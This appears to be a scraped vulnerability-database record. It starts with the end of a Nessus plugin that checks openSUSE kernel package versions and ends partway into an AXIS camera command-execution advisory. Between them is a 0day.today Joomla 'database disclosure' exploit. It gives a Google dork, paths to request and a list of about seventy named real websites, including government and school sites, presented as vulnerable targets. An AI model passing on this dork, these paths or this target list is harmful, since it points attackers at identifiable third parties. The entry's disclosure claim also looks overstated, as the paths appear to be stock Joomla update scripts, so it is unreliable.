);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1115431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116841\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1116962\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118316\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118505\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118798\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119946\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120758\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1120950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121239\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121621\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1122650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1122651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1122885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123357\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-9568\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debugsource-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debugsource-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-devel-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-devel-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-html-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-pdf-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-macros-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-debugsource-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-qa-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-vanilla-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-syms-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debuginfo-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debugsource-4.4.172-86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-devel-4.4.172-86.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-devel / kernel-macros / kernel-source / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-01-13T00:37:01", "description": "Joomla com_admin component versions 2.5.4 through 3.7.4 suffer from a database disclosure vulnerability.", "edition": 1, "published": "2018-11-25T00:00:00", "title": "Joomla Admin 3.7.4 Database Disclosure Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-25T00:00:00", "id": "1337DAY-ID-31673", "href": "https://0day.today/exploit/description/31673", "sourceData": "#################################################################################################\r\n\r\n# Exploit Title : Joomla com_admin Components from V2.5.4 to V3.7.4\r\nDatabase Backup Arbitrary File Download Vulnerability\r\n# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security\r\nArmy\r\n# Vendor Homepage : joomla.org\r\n+\r\ngithub.com/joomla-projects/gsoc18_override_management/tree/master/administrator/components/com_admin\r\n# Tested On : Windows and Linux\r\n# Category : WebApps\r\n# Version Information : V2.5.4 - V2.5.6 - V2.5.7 - V3.0.0 3.0.1\r\nV3.0. V3.0.3 V3.1.0 V3.1.1 V3.1.2 V3.1.3 V3.1.4 V3.1.5 V3.2.0 V3.2.1\r\nV3.4.0 V3.7.4 and if etcetera....\r\n# Google Dorks : inurl:''/administrator/components/com_admin/sql/''\r\n# Exploit Risk : Medium\r\n# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]\r\nCWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]\r\n\r\n#################################################################################################\r\n\r\n# Admin Panel Login Path :\r\n\r\n/administrator\r\n\r\n#################################################################################################\r\n\r\n# Exploit :\r\n\r\nCheck this folders =>\r\n\r\n/joomla/administrator/components/com_admin/sql/others/mysql/......\r\n\r\n/PATH/PATH/administrator/components/com_admin/sql/others/mysql/......\r\n\r\n/PATH/administrator/components/com_admin/sql/updates/mysql/......\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/......\r\n\r\n/administrator/components/com_admin/sql/updates/postgresql/.......\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/......\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql\r\n\r\n/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql\r\n\r\n/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql\r\n\r\n/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql\r\n\r\n/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql\r\n\r\n#################################################################################################\r\n\r\n# Example Vulnerable Sites =>\r\n\r\n[+]\r\nxpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql\r\n\r\n[+]\r\ncolegiosanpedroclaver.edu.co/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql\r\n\r\n[+]\r\nfreightdb.kzntransport.gov.za/administrator/components/com_admin/sql/updates/postgresql/3.1.0.sql\r\n\r\n[+]\r\nspeccontrol.pl/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql\r\n\r\n[+]\r\nintegratedfg.com/administrator/components/com_admin/sql/updates/mysql/2.5.9.sql\r\n\r\n[+]\r\nelroyce.com/home/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql\r\n\r\n[+]\r\ngroupepromotran.net/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql\r\n\r\n[+]\r\nclicdesourischemille.fr/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql\r\n\r\n[+]\r\nelmwoodnebraska.com/nl/administrator/components/com_admin/sql/updates/postgresql/3.9.0-2018-06-14.sql\r\n\r\n[+]\r\nkkn.cz/gdpr/administrator/components/com_admin/sql/updates/mysql/3.2.1.sql\r\n\r\n[+]\r\nflauzac.eu/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql\r\n\r\n[+]\r\ncd06ffme.fr/joomla/administrator/components/com_admin/sql/updates/sqlazure/2.5.15.sql\r\n\r\n[+]\r\nalcbrh.com/supp%209/joomla/administrator/components/com_admin/sql/updates/postgresql/3.2.0.sql\r\n\r\n[+]\r\nsunshrine.com/administrator/components/com_admin/sql/updates/mysql/2.5.14.sql.encrypted\r\n\r\n[+]\r\nmurraynebraska.com/nl/administrator/components/com_admin/sql/updates/sqlazure/3.2.1.sql\r\n\r\n[+]\r\nwitecc.com/wit/administrator/components/com_admin/sql/updates/mysql/3.0.2.sql\r\n\r\n[+]\r\nrecursosvirtualesperu.com/joomla/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql\r\n\r\n[+]\r\nlibrary.franklincountyva.gov/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql\r\n\r\n[+]\r\ntgr.org.hk/administrator/components/com_admin/sql/updates/postgresql/3.1.1.sql\r\n\r\n[+]\r\nsheltonbeach.org/administrator/components/com_admin/sql/updates/sqlazure/2.5.9.sql\r\n\r\n[+]\r\nlabarjaque.com/administrator/components/com_admin/sql/updates/mysql/3.0.3.sql\r\n\r\n[+]\r\nvir.nw.ru/test/vir.nw/administrator/components/com_admin/sql/updates/mysql/3.0.3.sql\r\n\r\n[+]\r\ngammarth-immobiliere.tn/new/administrator/components/com_admin/sql/updates/postgresql/3.1.3.sql\r\n\r\n[+]\r\nhfcforestry.com/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql\r\n\r\n[+]\r\nclickhouseghana.com/EchoStop/administrator/components/com_admin/sql/updates/postgresql/3.4.4-2015-07-11.sql\r\n\r\n[+]\r\nseaportsa.com/es/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql\r\n\r\n[+]\r\navagarrett.net/__MACOSX/bt_education_v3.0.0_j25_quickstart/administrator/components/com_admin/sql/updates/mysql/._1.7.0.sql\r\n\r\n[+]\r\nsuntechmed.com/__MACOSX/suntechmed15/administrator/components/com_admin/sql/updates/sqlazure/._3.1.3.sql\r\n\r\n[+]\r\nvillaalena.cz/administrator/components/com_admin/sql/updates/mysql/3.0.2.sql\r\n\r\n[+]\r\ncolo-passion.fr/site/videoprivate/administrator/components/com_admin/sql/updates/sqlazure/2.5.21.sql\r\n\r\n[+]\r\ncosemsmg.org.br/site/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql\r\n\r\n[+]\r\ndjabugay.org.au/Joomla/administrator/components/com_admin/sql/updates/sqlazure/3.1.5.sql\r\n\r\n[+]\r\nstoneandequipment.com/panama/administrator/components/com_admin/sql/updates/postgresql/3.1.5.sql\r\n\r\n[+]\r\nbrisbug.asn.au/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql\r\n\r\n[+]\r\nlopes.im/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql\r\n\r\n[+]\r\ninstitutoagricola.com/administrator/components/com_admin/sql/updates/sqlazure/3.7.4-2017-07-05.sql\r\n\r\n[+]\r\noperaciavianocnedieta.sk/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql\r\n\r\n[+]\r\nbillybobproducts.com/whitetaleslodge/administrator/components/com_admin/sql/updates/mysql/1.7.0.sql\r\n\r\n[+]\r\noperaciavianocnedieta.sk/administrator/components/com_admin/sql/updates/sqlazure/3.0.1.sql\r\n\r\n[+]\r\narnes.si/~sspmmetl/administrator/components/com_admin/sql/updates/mysql/3.1.4.sql\r\n\r\n[+]wenscom.it/administrator/components/com_admin/sql/updates/mysql/3.1.2.sql\r\n\r\n[+]\r\ncheerleading.com.sg/events/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-09-16.sql\r\n\r\n[+]\r\nosm.chiangrai.net/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql\r\n\r\n[+]\r\ndatacomplete.com/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql\r\n\r\n[+]\r\nmail.nisselwater.com/joomla30/administrator/components/com_admin/sql/updates/mysql/3.1.2.sql\r\n\r\n[+]\r\nhcerstein.com/joomla/administrator/components/com_admin/sql/updates/mysql/2.5.13.sql\r\n\r\n[+]\r\nepmanagementconsult.com/__MACOSX/administrator/components/com_admin/sql/updates/mysql/._3.1.1.sql\r\n\r\n[+]\r\nmvapower.com/MVASITE/administrator/components/com_admin/sql/updates/mysql/3.0.1.sql\r\n\r\n[+]\r\nallamericanbailbonds.com/__MACOSX/allamericanbailbonds.com/administrator/components/com_admin/sql/updates/mysql/._2.5.6.sql\r\n\r\n[+]\r\nmunicipalidadelbosque.cl/joomla/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql\r\n\r\n[+]\r\nyurtyay.com.tr/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql\r\n\r\n[+]\r\nuniversoautista.com.br/portal/administrator/components/com_admin/sql/updates/mysql/2.5.10.sql\r\n\r\n[+]\r\nhoefelmayr.net/Joomla/administrator/components/com_admin/sql/updates/mysql/2.5.10.sql\r\n\r\n[+]\r\npatrioticsolutions.com/sites/askkarate/administrator/components/com_admin/sql/updates/mysql/3.1.4.sql\r\n\r\n[+]\r\nhazelgreenfire.org/home/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql\r\n\r\n[+]\r\nmisioneritasarcadsa.com.ar/Joomla/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql\r\n\r\n[+]\r\nstaszickutno.pl/jbip/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-06.sql\r\n\r\n[+]\r\npkiakks.org/web2/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql\r\n\r\n[+]\r\nctnanotubos.com.br/projetos/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-12-03.sql\r\n\r\n[+]\r\ndev.intellizim.com/ppeinternational/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql\r\n\r\n[+]\r\npositanolirica.com.ar/positano/administrator/components/com_admin/sql/updates/postgresql/3.1.0.sql\r\n\r\n[+]\r\nreptileone.com.au/__MACOSX/shaper_awetive_quickstart_j3/administrator/components/com_admin/sql/updates/mysql/._2.5.11.sql\r\n\r\n[+]\r\nsportxanalitix.com/home/administrator/components/com_admin/sql/updates/mysql/3.6.0-2016-04-06.sql\r\n\r\n[+]\r\ntecso.com.mx/v2/__MACOSX/blog/administrator/components/com_admin/sql/updates/mysql/._3.0.1.sql\r\n\r\n[+]\r\nkohinoortarpaulin.net/administrator/components/com_admin/sql/updates/sqlazure/3.1.1.sql\r\n\r\n[+]\r\nraphstudio.com.br/site/v1/administrator/components/com_admin/sql/updates/sqlazure/3.1.5.sql\r\n\r\n[+]\r\nfotozrak.mk/print/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql\r\n\r\n[+]\r\nidealkorpus.com/pt/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql\r\n\r\n[+]\r\nateliedearomas.com.br/atelie/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql\r\n\r\n[+]\r\nbristolacneremoval.co.uk/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql\r\n\r\n[+]\r\nmoob.cl/clientes/__MACOSX/puc/administrator/components/com_admin/sql/others/mysql/._utf8mb4-conversion-01.sql\r\n\r\n[+]\r\nskansjofrakt.se/joo2/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql\r\n\r\n[+]\r\nutilsoluciones.com/en/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql\r\n\r\n[+]\r\nigorgalic.freeserverhost.com/joomla/administrator/components/com_admin/sql/updates/mysql/2.5.1-2012-01-26.sql\r\n\r\n#################################################################################################\r\n\r\n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team\r\n\r\n#################################################################################################\n\n# 0day.today [2019-01-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31673"}, {"lastseen": "2018-04-03T13:27:59", "edition": 2, "description": "Exploit for linux platform in category web applications", "published": "2016-07-29T00:00:00", "type": "zdt", "title": "AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8257"], "modified": "2016-07-29T00:00:00", "id": "1337DAY-ID-25204", "href": "https://0day.today/exploit/description/25204", "sourceData": "* Advisory Information\r\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector\r\n(+) Vendor: AXIS Communications\r\n(+) Research and Advisory: Orwelllabs\r\n(+) Advisory URL: http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html\r\n(+) Class: Improper Input Validation [CWE-20]\r\n(+) CVE Name: CVE-2015-8257\r\n(+) Remotely Exploitable: Yes\r\n(+) Locally Exploitable: No\r\n(+) OLSA-ID: OWLL2015-8257\r\n(+) Affected Versions: Multiple Products/Firmwares (check the list bellow)\r\n(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization\r\n(+) Owasp IoTTop10: I1, I2\r\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n \r\n \r\nVulnerability\r\n+++++++++++++\r\nAXIS Network Cameras (various models/firmwares) are prone to Authenticated remote\r\ncommand execution vulnerability. Exploiting this vulnerability a remote attacker can\r\nforce the execution of certain unauthorized actions, which may lead to further attacks.\r\n \r\nTechnical Details\r\n+++++++++++++++++\r\nThe devtools.sh script is the responsible for vulnerability 